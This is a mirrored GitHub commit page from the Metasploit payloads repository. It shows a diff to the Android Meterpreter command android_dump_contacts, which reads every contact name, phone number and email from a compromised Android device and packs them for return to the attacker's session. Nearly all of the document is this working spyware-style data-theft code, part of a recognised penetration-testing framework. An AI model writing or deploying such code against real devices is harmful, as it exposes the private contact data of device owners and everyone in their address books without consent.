github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-03-24 18:16:24 +01:00
Code Releases Activity

fix android_dump_contacts display name duplicated in phone numbers list

Browse Source
This commit is contained in:
Tim 2017-01-21 18:03:36 +08:00
parent a35889aff5
commit 6608944236
No known key found for this signature in database
GPG Key ID: 62361A8B17EEED19
1 changed files with 27 additions and 41 deletions

68
java/androidpayload/library/src/com/metasploit/meterpreter/android/android_dump_contacts.java

@ -5,6 +5,7 @@ import android.database.Cursor;
import android.net.Uri;
import android.os.Build;
import android.provider.ContactsContract;
import com.metasploit.meterpreter.AndroidMeterpreter;
import com.metasploit.meterpreter.Meterpreter;
import com.metasploit.meterpreter.TLVPacket;
@ -22,10 +23,6 @@ public class android_dump_contacts implements Command {
private static final int TLV_TYPE_CONTACT_NAME = TLVPacket.TLV_META_TYPE_STRING
| (TLV_EXTENSIONS + 9010);
private static final String classNameContacts = "android.provider.ContactsContract$Contacts";
private static final String classNameData = "android.provider.ContactsContract$Data";
private static final String classNameEmail = "android.provider.ContactsContract$CommonDataKinds$Email";
private static final String contentUri = "CONTENT_URI";
private static final String _id = "_id";
private static final String displayName = "display_name";
private static final String contactId = "contact_id";
@ -39,48 +36,37 @@ public class android_dump_contacts implements Command {
.getContentResolver();
if (Integer.parseInt(Build.VERSION.RELEASE.substring(0, 1)) >= 2) {
Uri ContactUri = null, PhoneUri = null, EmailUri = null;
Class<?> c = Class.forName(classNameContacts);
ContactUri = (Uri) c.getField(contentUri).get(ContactUri);
Uri ContactUri = ContactsContract.Contacts.CONTENT_URI;
Uri PhoneUri = ContactsContract.CommonDataKinds.Phone.CONTENT_URI;
Uri EmailUri = ContactsContract.CommonDataKinds.Email.CONTENT_URI;
Cursor cur = cr.query(ContactUri, null, null, null, null);
if (cur.getCount() > 0) {
while (cur.moveToNext()) {
TLVPacket pckt = new TLVPacket();
String id = cur.getString(cur.getColumnIndex(_id));
while (cur.moveToNext()) {
TLVPacket pckt = new TLVPacket();
String id = cur.getString(cur.getColumnIndex(_id));
pckt.addOverflow(TLV_TYPE_CONTACT_NAME,
cur.getString(cur.getColumnIndex(displayName)));
c = Class.forName(classNameData);
PhoneUri = (Uri) c.getField(contentUri).get(PhoneUri);
Cursor pCur = cr.query(PhoneUri, null, contactId + " = ?",
new String[]{id}, null);
while (pCur.moveToNext()) {
pckt.addOverflow(TLV_TYPE_CONTACT_NUMBER,
pCur.getString(pCur.getColumnIndex(data1)));
}
pCur.close();
c = Class.forName(classNameEmail);
EmailUri = (Uri) c.getField(contentUri).get(EmailUri);
Cursor emailCur = cr.query(EmailUri, null, contactId
+ " = ?", new String[]{id}, null);
while (emailCur.moveToNext()) {
pckt.addOverflow(TLV_TYPE_CONTACT_EMAIL, emailCur
.getString(emailCur.getColumnIndex(data1)));
}
emailCur.close();
response.addOverflow(TLV_TYPE_CONTACT_GROUP, pckt);
// Name
pckt.addOverflow(TLV_TYPE_CONTACT_NAME, cur.getString(cur.getColumnIndex(displayName)));
// Number
Cursor pCur = cr.query(PhoneUri, null, contactId + " = ?",
new String[]{id}, null);
while (pCur.moveToNext()) {
pckt.addOverflow(TLV_TYPE_CONTACT_NUMBER,
pCur.getString(pCur.getColumnIndex(data1)));
}
pCur.close();
// Email
Cursor emailCur = cr.query(EmailUri, null, contactId
+ " = ?", new String[]{id}, null);
while (emailCur.moveToNext()) {
pckt.addOverflow(TLV_TYPE_CONTACT_EMAIL, emailCur
.getString(emailCur.getColumnIndex(data1)));
}
emailCur.close();
response.addOverflow(TLV_TYPE_CONTACT_GROUP, pckt);
}
cur.close();